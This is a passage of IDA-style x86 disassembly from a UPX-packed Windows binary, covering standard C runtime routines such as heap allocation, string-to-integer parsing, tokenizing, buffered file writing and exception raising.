loc_419B18: ; DATA XREF: UPX0:stru_424F28�o
mov esp, [ebp+ms_exc.old_esp]
call sub_41C0A8
xor ebx, ebx
xor edi, edi
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov esi, [ebp+var_1C]
loc_419B2B: ; CODE XREF: sub_419A76+9C�j
cmp edi, ebx
jnz short loc_419B45
push [ebp+var_20]
call sub_419DCB
pop ecx
mov edi, eax
mov [ebp+var_24], 1
cmp edi, ebx
jz short loc_419B72
loc_419B45: ; CODE XREF: sub_419A76+B7�j
push 1
push dword ptr [esi+4]
push [ebp+var_20]
push edi
push 0FFFFFFFFh
push [ebp+arg_0]
push 100h
push dword ptr [esi+14h]
call sub_41C18B
add esp, 20h
test eax, eax
jz short loc_419B72
push edi
push [ebp+arg_0]
call sub_41BFB0
pop ecx
pop ecx
loc_419B72: ; CODE XREF: sub_419A76+CD�j
; sub_419A76+EF�j
cmp [ebp+var_24], ebx
jz short loc_419B7E
push edi
call sub_419DDD
pop ecx
loc_419B7E: ; CODE XREF: sub_419A76+7C�j
; sub_419A76+FF�j
mov eax, [ebp+arg_0]
loc_419B81: ; CODE XREF: sub_419A76+3C�j
; sub_419A76+58�j
lea esp, [ebp-34h]
call __SEH_epilog
retn
sub_419A76 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419B8A proc near ; CODE XREF: sub_4030C0+6A�p
; sub_4033F0+6C�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push esi
mov esi, [ebp+arg_0]
push edi
lea eax, [ebp+arg_8]
push eax
push [ebp+arg_4]
lea eax, [ebp+var_20]
push eax
mov [ebp+var_1C], 7FFFFFFFh
mov [ebp+var_14], 42h
mov [ebp+var_18], esi
mov [ebp+var_20], esi
call sub_41C6EE
add esp, 0Ch
test esi, esi
mov edi, eax
jz short loc_419BDC
dec [ebp+var_1C]
js short loc_419BCF
mov eax, [ebp+var_20]
mov byte ptr [eax], 0
jmp short loc_419BDC
; ---------------------------------------------------------------------------
loc_419BCF: ; CODE XREF: sub_419B8A+3B�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_41C547
pop ecx
pop ecx
loc_419BDC: ; CODE XREF: sub_419B8A+36�j
; sub_419B8A+43�j
mov eax, edi
pop edi
pop esi
leave
retn
sub_419B8A endp
; =============== S U B R O U T I N E =======================================
sub_419BE2 proc near ; CODE XREF: sub_419C6A�j
; sub_4218B5+33�p
arg_0 = dword ptr 4
push esi
push edi
call sub_41B330
mov edi, [eax+64h]
cmp edi, off_42A5CC
jz short loc_419BFB
call sub_41B2CF
mov edi, eax
loc_419BFB: ; CODE XREF: sub_419BE2+10�j
mov esi, [esp+8+arg_0]
loc_419BFF: ; CODE XREF: sub_419BE2+43�j
cmp dword ptr [edi+28h], 1
movzx eax, byte ptr [esi]
jle short loc_419C16
push 8
push eax
push edi
call sub_41CEE8
add esp, 0Ch
jmp short loc_419C20
; ---------------------------------------------------------------------------
loc_419C16: ; CODE XREF: sub_419BE2+24�j
mov ecx, [edi+48h]
movzx eax, byte ptr [ecx+eax*2]
and eax, 8
loc_419C20: ; CODE XREF: sub_419BE2+32�j
test eax, eax
jz short loc_419C27
inc esi
jmp short loc_419BFF
; ---------------------------------------------------------------------------
loc_419C27: ; CODE XREF: sub_419BE2+40�j
movzx ecx, byte ptr [esi]
inc esi
cmp ecx, 2Dh
mov edx, ecx
jz short loc_419C37
cmp ecx, 2Bh
jnz short loc_419C3B
loc_419C37: ; CODE XREF: sub_419BE2+4E�j
movzx ecx, byte ptr [esi]
inc esi
loc_419C3B: ; CODE XREF: sub_419BE2+53�j
xor eax, eax
loc_419C3D: ; CODE XREF: sub_419BE2+7C�j
cmp ecx, 30h
jl short loc_419C4C
cmp ecx, 39h
jg short loc_419C4C
sub ecx, 30h
jmp short loc_419C4F
; ---------------------------------------------------------------------------
loc_419C4C: ; CODE XREF: sub_419BE2+5E�j
; sub_419BE2+63�j
or ecx, 0FFFFFFFFh
loc_419C4F: ; CODE XREF: sub_419BE2+68�j
cmp ecx, 0FFFFFFFFh
jz short loc_419C60
lea eax, [eax+eax*4]
lea eax, [ecx+eax*2]
movzx ecx, byte ptr [esi]
inc esi
jmp short loc_419C3D
; ---------------------------------------------------------------------------
loc_419C60: ; CODE XREF: sub_419BE2+70�j
cmp edx, 2Dh
pop edi
pop esi
jnz short locret_419C69
neg eax
locret_419C69: ; CODE XREF: sub_419BE2+83�j
retn
sub_419BE2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_419C6A proc near ; CODE XREF: sub_403950+87B�p
; sub_403950+9D9�p ...
jmp sub_419BE2
sub_419C6A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419C6F proc near ; CODE XREF: sub_403950+86E�p
; sub_403950+897�p ...
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 28h
mov eax, dword_42A290
push ebx
push esi
mov esi, [ebp+arg_4]
push edi
mov [ebp+var_4], eax
call sub_41B330
push 8
pop ecx
mov [ebp+var_28], eax
xor eax, eax
lea edi, [ebp+var_24]
push 7
rep stosd
pop edi
loc_419C98: ; CODE XREF: sub_419C6F+42�j
mov dl, [esi]
movzx ecx, dl
mov eax, ecx
and ecx, edi
mov bl, 1
shl bl, cl
shr eax, 3
lea eax, [ebp+eax+var_24]
or [eax], bl
inc esi
test dl, dl
jnz short loc_419C98
mov edx, [ebp+arg_0]
test edx, edx
jnz short loc_419CC7
mov eax, [ebp+var_28]
mov edx, [eax+18h]
jmp short loc_419CC7
; ---------------------------------------------------------------------------
loc_419CC2: ; CODE XREF: sub_419C6F+6F�j
test al, al
jz short loc_419CE0
inc edx
loc_419CC7: ; CODE XREF: sub_419C6F+49�j
; sub_419C6F+51�j
mov al, [edx]
movzx esi, al
xor ebx, ebx
mov ecx, esi
and ecx, edi
inc ebx
shl ebx, cl
shr esi, 3
mov cl, [ebp+esi+var_24]
test bl, cl
jnz short loc_419CC2
loc_419CE0: ; CODE XREF: sub_419C6F+55�j
mov ebx, edx
jmp short loc_419CFC
; ---------------------------------------------------------------------------
loc_419CE4: ; CODE XREF: sub_419C6F+90�j
movzx esi, byte ptr [edx]
xor eax, eax
mov ecx, esi
and ecx, edi
inc eax
shl eax, cl
shr esi, 3
mov cl, [ebp+esi+var_24]
test al, cl
jnz short loc_419D03
inc edx
loc_419CFC: ; CODE XREF: sub_419C6F+73�j
cmp byte ptr [edx], 0
jnz short loc_419CE4
jmp short loc_419D07
; ---------------------------------------------------------------------------
loc_419D03: ; CODE XREF: sub_419C6F+8A�j
mov byte ptr [edx], 0
inc edx
loc_419D07: ; CODE XREF: sub_419C6F+92�j
mov eax, [ebp+var_28]
mov ecx, [ebp+var_4]
mov [eax+18h], edx
mov eax, ebx
sub eax, edx
neg eax
pop edi
sbb eax, eax
and eax, ebx
pop esi
pop ebx
call sub_4192B6
leave
retn
sub_419C6F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419D24 proc near ; CODE XREF: sub_419D9F+B�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push offset stru_424F38
call __SEH_prolog
mov esi, [ebp+arg_0]
cmp ds:dword_47C774, 3
jnz short loc_419D6A
cmp esi, ds:dword_47C760
ja short loc_419D6A
push 4
call sub_41D0E7
pop ecx
and [ebp+ms_exc.disabled], 0
push esi
call sub_41D9AA
pop ecx
mov [ebp+var_1C], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_419D96
mov eax, [ebp+var_1C]
test eax, eax
jnz short loc_419D8D
loc_419D6A: ; CODE XREF: sub_419D24+16�j
; sub_419D24+1E�j
test esi, esi
jnz short loc_419D6F
inc esi
loc_419D6F: ; CODE XREF: sub_419D24+48�j
cmp ds:dword_47C774, 1
jz short loc_419D7E
add esi, 0Fh
and esi, 0FFFFFFF0h
loc_419D7E: ; CODE XREF: sub_419D24+52�j
push esi
push 0
push ds:dword_47C770
call dword_424198 ; RtlAllocateHeap
loc_419D8D: ; CODE XREF: sub_419D24+44�j
call __SEH_epilog
retn
sub_419D24 endp
; =============== S U B R O U T I N E =======================================
sub_419D93 proc near ; DATA XREF: UPX0:stru_424F38�o
mov esi, [ebp+8]
sub_419D93 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_419D96 proc near ; CODE XREF: sub_419D24+3A�p
push 4
call sub_41D032
pop ecx
retn
sub_419D96 endp
; =============== S U B R O U T I N E =======================================
sub_419D9F proc near ; CODE XREF: sub_419DCB+A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0FFFFFFE0h
ja short loc_419DC8
loc_419DA6: ; CODE XREF: sub_419D9F+27�j
push [esp+arg_0]
call sub_419D24
test eax, eax
pop ecx
jnz short locret_419DCA
cmp [esp+arg_4], eax
jz short locret_419DCA
push [esp+arg_0]
call sub_41AC3E
test eax, eax
pop ecx
jnz short loc_419DA6
loc_419DC8: ; CODE XREF: sub_419D9F+5�j
xor eax, eax
locret_419DCA: ; CODE XREF: sub_419D9F+13�j
; sub_419D9F+19�j
retn
sub_419D9F endp
; =============== S U B R O U T I N E =======================================
sub_419DCB proc near ; CODE XREF: sub_404550+8�p
; sub_4091D0+1E6�p ...
arg_0 = dword ptr 4
push dword_44C040
push [esp+4+arg_0]
call sub_419D9F
pop ecx
pop ecx
retn
sub_419DCB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419DDD proc near ; CODE XREF: sub_404590+E�j
; sub_4091D0+4AF�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 00419E39 SIZE 00000015 BYTES
push 0Ch
push offset stru_424F48
call __SEH_prolog
mov esi, [ebp+arg_0]
test esi, esi
jz short loc_419E48
cmp ds:dword_47C774, 3
jnz short loc_419E39
push 4
call sub_41D0E7
pop ecx
and [ebp+ms_exc.disabled], 0
push esi
call sub_41D1CB
pop ecx
mov [ebp+var_1C], eax
test eax, eax
jz short loc_419E1C
push esi
push eax
call sub_41D1F6
pop ecx
pop ecx
loc_419E1C: ; CODE XREF: sub_419DDD+34�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_419E30
cmp [ebp+var_1C], 0
jnz short loc_419E48
push [ebp+arg_0]
jmp short loc_419E3A
sub_419DDD endp
; =============== S U B R O U T I N E =======================================
sub_419E30 proc near ; CODE XREF: sub_419DDD+43�p
; DATA XREF: UPX0:stru_424F48�o
push 4
call sub_41D032
pop ecx
retn
sub_419E30 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_419DDD
loc_419E39: ; CODE XREF: sub_419DDD+1A�j
push esi
loc_419E3A: ; CODE XREF: sub_419DDD+51�j
push 0
push ds:dword_47C770
call dword_42419C ; RtlFreeHeap
loc_419E48: ; CODE XREF: sub_419DDD+11�j
; sub_419DDD+4C�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_419DDD
; =============== S U B R O U T I N E =======================================
sub_419E4E proc near ; CODE XREF: sub_419E9A+32�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
or edi, 0FFFFFFFFh
test byte ptr [esi+0Ch], 83h
jz short loc_419E91
push esi
call sub_41DDEF
push esi
mov edi, eax
call sub_41DDC4
push dword ptr [esi+10h]
call sub_41DD29
add esp, 0Ch
test eax, eax
jge short loc_419E7F
or edi, 0FFFFFFFFh
jmp short loc_419E91
; ---------------------------------------------------------------------------
loc_419E7F: ; CODE XREF: sub_419E4E+2A�j
mov eax, [esi+1Ch]
test eax, eax
jz short loc_419E91
push eax
call sub_419DDD
and dword ptr [esi+1Ch], 0
pop ecx
loc_419E91: ; CODE XREF: sub_419E4E+D�j
; sub_419E4E+2F�j ...
and dword ptr [esi+0Ch], 0
mov eax, edi
pop edi
pop esi
retn
sub_419E4E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419E9A proc near ; CODE XREF: sub_404660+3A�p
; sub_40B0E0+3F�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push offset stru_424F58
call __SEH_prolog
or [ebp+var_1C], 0FFFFFFFFh
mov esi, [ebp+arg_0]
test byte ptr [esi+0Ch], 40h
jz short loc_419EC0
and dword ptr [esi+0Ch], 0
loc_419EB7: ; CODE XREF: sub_419E9A+44�j
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
; ---------------------------------------------------------------------------
loc_419EC0: ; CODE XREF: sub_419E9A+17�j
push esi
call sub_41AB2E
pop ecx
and [ebp+ms_exc.disabled], 0
push esi
call sub_419E4E
pop ecx
mov [ebp+var_1C], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_419EE3
jmp short loc_419EB7
sub_419E9A endp
; =============== S U B R O U T I N E =======================================
sub_419EE0 proc near ; DATA XREF: UPX0:stru_424F58�o
mov esi, [ebp+8]
sub_419EE0 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_419EE3 proc near ; CODE XREF: sub_419E9A+3F�p
push esi
call sub_41AB80
pop ecx
retn
sub_419EE3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419EEB proc near ; CODE XREF: sub_419FF2+25�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_0]
push ebx
push edi
mov edi, [ebp+arg_4]
imul edi, [ebp+arg_8]
test edi, edi
mov [ebp+arg_0], eax
mov [ebp+var_8], edi
mov ebx, edi
jnz short loc_419F0F
xor eax, eax
jmp loc_419FDA
; ---------------------------------------------------------------------------
loc_419F0F: ; CODE XREF: sub_419EEB+1B�j
push esi
mov esi, [ebp+arg_C]
test word ptr [esi+0Ch], 10Ch
jz short loc_419F23
mov eax, [esi+18h]
mov [ebp+var_4], eax
jmp short loc_419F2A
; ---------------------------------------------------------------------------
loc_419F23: ; CODE XREF: sub_419EEB+2E�j
mov [ebp+var_4], 1000h
loc_419F2A: ; CODE XREF: sub_419EEB+36�j
; sub_419EEB+E5�j
mov ecx, [esi+0Ch]
and ecx, 108h
jz short loc_419F5E
mov eax, [esi+4]
test eax, eax
jz short loc_419F5E
cmp ebx, eax
mov edi, ebx
jb short loc_419F44
mov edi, eax
loc_419F44: ; CODE XREF: sub_419EEB+55�j
push edi
push [ebp+arg_0]
push dword ptr [esi]
call sub_41E1E0
sub [esi+4], edi
add [esi], edi
add esp, 0Ch
sub ebx, edi
add [ebp+arg_0], edi
jmp short loc_419FA0
; ---------------------------------------------------------------------------
loc_419F5E: ; CODE XREF: sub_419EEB+48�j
; sub_419EEB+4F�j
cmp ebx, [ebp+var_4]
jb short loc_419FA5
test ecx, ecx
jz short loc_419F72
push esi
call sub_41DDEF
test eax, eax
pop ecx
jnz short loc_419FDE
loc_419F72: ; CODE XREF: sub_419EEB+7A�j
cmp [ebp+var_4], 0
mov edi, ebx
jz short loc_419F83
xor edx, edx
mov eax, ebx
div [ebp+var_4]
sub edi, edx
loc_419F83: ; CODE XREF: sub_419EEB+8D�j
push edi
push [ebp+arg_0]
push dword ptr [esi+10h]
call sub_41E126
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz short loc_419FE9
add [ebp+arg_0], eax
sub ebx, eax
cmp eax, edi
jb short loc_419FE9
loc_419FA0: ; CODE XREF: sub_419EEB+71�j
mov edi, [ebp+var_8]
jmp short loc_419FCE
; ---------------------------------------------------------------------------
loc_419FA5: ; CODE XREF: sub_419EEB+76�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
push esi
push eax
call sub_41C547
cmp eax, 0FFFFFFFFh
pop ecx
pop ecx
jz short loc_419FDE
inc [ebp+arg_0]
mov eax, [esi+18h]
dec ebx
test eax, eax
mov [ebp+var_4], eax
jg short loc_419FCE
mov [ebp+var_4], 1
loc_419FCE: ; CODE XREF: sub_419EEB+B8�j
; sub_419EEB+DA�j
test ebx, ebx
jnz loc_419F2A
mov eax, [ebp+arg_8]
loc_419FD9: ; CODE XREF: sub_419EEB+FC�j
pop esi
loc_419FDA: ; CODE XREF: sub_419EEB+1F�j
pop edi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_419FDE: ; CODE XREF: sub_419EEB+85�j
; sub_419EEB+CC�j
mov eax, edi
loc_419FE0: ; CODE XREF: sub_419EEB+105�j
sub eax, ebx
xor edx, edx
div [ebp+arg_4]
jmp short loc_419FD9
; ---------------------------------------------------------------------------
loc_419FE9: ; CODE XREF: sub_419EEB+AA�j
; sub_419EEB+B3�j
or dword ptr [esi+0Ch], 20h
mov eax, [ebp+var_8]
jmp short loc_419FE0
sub_419EEB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419FF2 proc near ; CODE XREF: sub_404660+34�p
; sub_40B0E0+37�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push 0Ch
push offset stru_424F68
call __SEH_prolog
push [ebp+arg_C]
call sub_41AB2E
pop ecx
and [ebp+ms_exc.disabled], 0
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_419EEB
add esp, 10h
mov [ebp+var_1C], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41A034
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_419FF2 endp
; =============== S U B R O U T I N E =======================================
sub_41A034 proc near ; CODE XREF: sub_419FF2+34�p
; DATA XREF: UPX0:stru_424F68�o
push dword ptr [ebp+14h]
call sub_41AB80
pop ecx
retn
sub_41A034 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A03E proc near ; CODE XREF: sub_41A09A+A�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push 10h
push offset stru_424F78
call __SEH_prolog
call sub_41E70A
mov [ebp+var_1C], eax
test eax, eax
jnz short loc_41A065
call sub_41E685
mov dword ptr [eax], 18h
xor eax, eax
jmp short loc_41A08A
; ---------------------------------------------------------------------------
loc_41A065: ; CODE XREF: sub_41A03E+16�j
and [ebp+ms_exc.disabled], 0
push eax
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41E51D
add esp, 10h
mov [ebp+var_20], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41A090
mov eax, [ebp+var_20]
loc_41A08A: ; CODE XREF: sub_41A03E+25�j
call __SEH_epilog
retn
sub_41A03E endp
; =============== S U B R O U T I N E =======================================
sub_41A090 proc near ; CODE XREF: sub_41A03E+44�p
; DATA XREF: UPX0:stru_424F78�o
push dword ptr [ebp-1Ch]
call sub_41AB80
pop ecx
retn
sub_41A090 endp
; =============== S U B R O U T I N E =======================================
sub_41A09A proc near ; CODE XREF: sub_404660+18�p
; sub_40B0E0+1F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push 40h
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_41A03E
add esp, 0Ch
retn
sub_41A09A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A0AD proc near ; CODE XREF: sub_4055E0+44�p
; sub_410030+27�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 18h
push offset stru_424F88
call __SEH_prolog
xor ebx, ebx
mov [ebp+var_24], ebx
call sub_41B330
mov esi, [eax+64h]
mov [ebp+var_1C], esi
cmp esi, off_42A5CC
jz short loc_41A0DB
call sub_41B2CF
mov esi, eax
mov [ebp+var_1C], esi
loc_41A0DB: ; CODE XREF: sub_41A0AD+22�j
mov eax, [esi+14h]
cmp eax, ebx
jnz short loc_41A10A
mov eax, [ebp+arg_0]
mov edx, eax
cmp [eax], bl
jz loc_41A1B8
loc_41A0EF: ; CODE XREF: sub_41A0AD+56�j
mov cl, [edx]
cmp cl, 61h
jl short loc_41A100
cmp cl, 7Ah
jg short loc_41A100
sub cl, 20h
mov [edx], cl
loc_41A100: ; CODE XREF: sub_41A0AD+47�j
; sub_41A0AD+4C�j
inc edx
cmp [edx], bl
jnz short loc_41A0EF
jmp loc_41A1B8
; ---------------------------------------------------------------------------
loc_41A10A: ; CODE XREF: sub_41A0AD+33�j
push 1
push dword ptr [esi+4]
push ebx
push ebx
push 0FFFFFFFFh
push [ebp+arg_0]
push 200h
push eax
call sub_41C18B
add esp, 20h
mov [ebp+var_20], eax
cmp eax, ebx
jz loc_41A1B5
mov [ebp+ms_exc.disabled], ebx
add eax, 3
and eax, 0FFFFFFFCh
call sub_4192D0
mov [ebp+ms_exc.old_esp], esp
mov edi, esp
mov [ebp+var_28], edi
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_41A162
; ---------------------------------------------------------------------------
loc_41A14B: ; DATA XREF: UPX0:stru_424F88�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41A14F: ; DATA XREF: UPX0:stru_424F88�o
mov esp, [ebp+ms_exc.old_esp]
call sub_41C0A8
xor ebx, ebx
xor edi, edi
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov esi, [ebp+var_1C]
loc_41A162: ; CODE XREF: sub_41A0AD+9C�j
cmp edi, ebx
jnz short loc_41A17C
push [ebp+var_20]
call sub_419DCB
pop ecx
mov edi, eax
mov [ebp+var_24], 1
cmp edi, ebx
jz short loc_41A1A9
loc_41A17C: ; CODE XREF: sub_41A0AD+B7�j
push 1
push dword ptr [esi+4]
push [ebp+var_20]
push edi
push 0FFFFFFFFh
push [ebp+arg_0]
push 200h
push dword ptr [esi+14h]
call sub_41C18B
add esp, 20h
test eax, eax
jz short loc_41A1A9
push edi
push [ebp+arg_0]
call sub_41BFB0
pop ecx
pop ecx
loc_41A1A9: ; CODE XREF: sub_41A0AD+CD�j
; sub_41A0AD+EF�j
cmp [ebp+var_24], ebx
jz short loc_41A1B5
push edi
call sub_419DDD
pop ecx
loc_41A1B5: ; CODE XREF: sub_41A0AD+7C�j
; sub_41A0AD+FF�j
mov eax, [ebp+arg_0]
loc_41A1B8: ; CODE XREF: sub_41A0AD+3C�j
; sub_41A0AD+58�j
lea esp, [ebp-34h]
call __SEH_epilog
retn
sub_41A0AD endp
; =============== S U B R O U T I N E =======================================
sub_41A1C1 proc near ; CODE XREF: sub_41A269+18�p
push esi
push ds:dword_47C748
call sub_41EBA0
pop ecx
mov ecx, ds:dword_47C744
mov esi, eax
mov eax, ds:dword_47C748
mov edx, ecx
sub edx, eax
add edx, 4
cmp esi, edx
jnb short loc_41A234
mov ecx, 800h
cmp esi, ecx
jnb short loc_41A1F1
mov ecx, esi
loc_41A1F1: ; CODE XREF: sub_41A1C1+2C�j
add ecx, esi
push ecx
push eax
call sub_41E82C
test eax, eax
pop ecx
pop ecx
jnz short loc_41A217
add esi, 10h
push esi
push ds:dword_47C748
call sub_41E82C
test eax, eax
pop ecx
pop ecx
jnz short loc_41A217
pop esi
retn
; ---------------------------------------------------------------------------
loc_41A217: ; CODE XREF: sub_41A1C1+3D�j
; sub_41A1C1+52�j
mov ecx, ds:dword_47C744
sub ecx, ds:dword_47C748
mov ds:dword_47C748, eax
sar ecx, 2
lea ecx, [eax+ecx*4]
mov ds:dword_47C744, ecx
loc_41A234: ; CODE XREF: sub_41A1C1+23�j
mov [ecx], edi
add ds:dword_47C744, 4
mov eax, edi
pop esi
retn
sub_41A1C1 endp
; =============== S U B R O U T I N E =======================================
sub_41A241 proc near ; DATA XREF: UPX0:00428034�o
push 80h
call sub_419DCB
test eax, eax
pop ecx
mov ds:dword_47C748, eax
jnz short loc_41A259
push 18h
pop eax
retn
; ---------------------------------------------------------------------------
loc_41A259: ; CODE XREF: sub_41A241+12�j
and dword ptr [eax], 0
mov eax, ds:dword_47C748
mov ds:dword_47C744, eax
xor eax, eax
retn
sub_41A241 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A269 proc near ; CODE XREF: sub_41A2A1+4�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push offset stru_424F98
call __SEH_prolog
call sub_41EA09
and [ebp+ms_exc.disabled], 0
mov edi, [ebp+arg_0]
call sub_41A1C1
mov [ebp+var_1C], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41A29B
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_41A269 endp
; =============== S U B R O U T I N E =======================================
sub_41A29B proc near ; CODE XREF: sub_41A269+24�p
; DATA XREF: UPX0:stru_424F98�o
call sub_41EA12
retn
sub_41A29B endp
; =============== S U B R O U T I N E =======================================
sub_41A2A1 proc near ; CODE XREF: sub_419224+3C�p
; sub_41EA33+40�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_41A269
neg eax
sbb eax, eax
neg eax
pop ecx
dec eax
retn
sub_41A2A1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A2B3 proc near ; CODE XREF: UPX0:0040700B�p
; sub_407140+10F�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
push edi
push 8
pop ecx
mov esi, offset dword_424FA4
lea edi, [ebp+var_20]
rep movsd
mov [ebp+var_8], eax
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
lea eax, [ebp+var_C]
push eax
push [ebp+var_10]
push [ebp+var_1C]
push [ebp+var_20]
call dword_4241A0 ; RaiseException
pop edi
pop esi
leave
retn 8
sub_41A2B3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A2ED proc near ; CODE XREF: sub_407090+1D�p
; sub_407090+57�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
push edi
push [ebp+arg_C]
mov [ebp+var_1C], eax
push [ebp+arg_8]
lea eax, [ebp+var_20]
push eax
mov [ebp+var_14], 42h
mov [ebp+var_18], esi
mov [ebp+var_20], esi
call sub_41C6EE
add esp, 0Ch
test esi, esi
mov edi, eax
jz short loc_41A33D
dec [ebp+var_1C]
js short loc_41A330
mov eax, [ebp+var_20]
mov byte ptr [eax], 0
jmp short loc_41A33D
; ---------------------------------------------------------------------------
loc_41A330: ; CODE XREF: sub_41A2ED+39�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_41C547
pop ecx
pop ecx
loc_41A33D: ; CODE XREF: sub_41A2ED+34�j
; sub_41A2ED+41�j
mov eax, edi
pop edi
pop esi
leave
retn
sub_41A2ED endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A343 proc near ; CODE XREF: sub_41A389+3�p
ms_exc = CPPEH_RECORD ptr -18h
push 8
push offset stru_424FD0
call __SEH_prolog
mov esi, ecx
mov dword ptr [esi], offset off_424FC8
push 0Eh
call sub_41D0E7
pop ecx
and [ebp+ms_exc.disabled], 0
mov esi, [esi+4]
test esi, esi
jz short loc_41A371
push esi
call sub_419DDD
pop ecx
loc_41A371: ; CODE XREF: sub_41A343+25�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41A380
call __SEH_epilog
retn
sub_41A343 endp
; =============== S U B R O U T I N E =======================================
sub_41A380 proc near ; CODE XREF: sub_41A343+32�p
; DATA XREF: UPX0:stru_424FD0�o
push 0Eh
call sub_41D032
pop ecx
retn
sub_41A380 endp
; =============== S U B R O U T I N E =======================================
sub_41A389 proc near ; DATA XREF: UPX0:off_424FC8�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_41A343
test [esp+4+arg_0], 1
jz short loc_41A39F
push esi
call sub_41930D
pop ecx
loc_41A39F: ; CODE XREF: sub_41A389+D�j
mov eax, esi
pop esi
retn 4
sub_41A389 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A3A5 proc near ; CODE XREF: sub_4139F0+F5�p
; sub_413B10+63F�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push eax
mov [ebp+var_14], 49h
mov [ebp+var_18], eax
mov [ebp+var_20], eax
call sub_41FAB0
mov [ebp+var_1C], eax
lea eax, [ebp+arg_8]
push eax
push [ebp+arg_4]
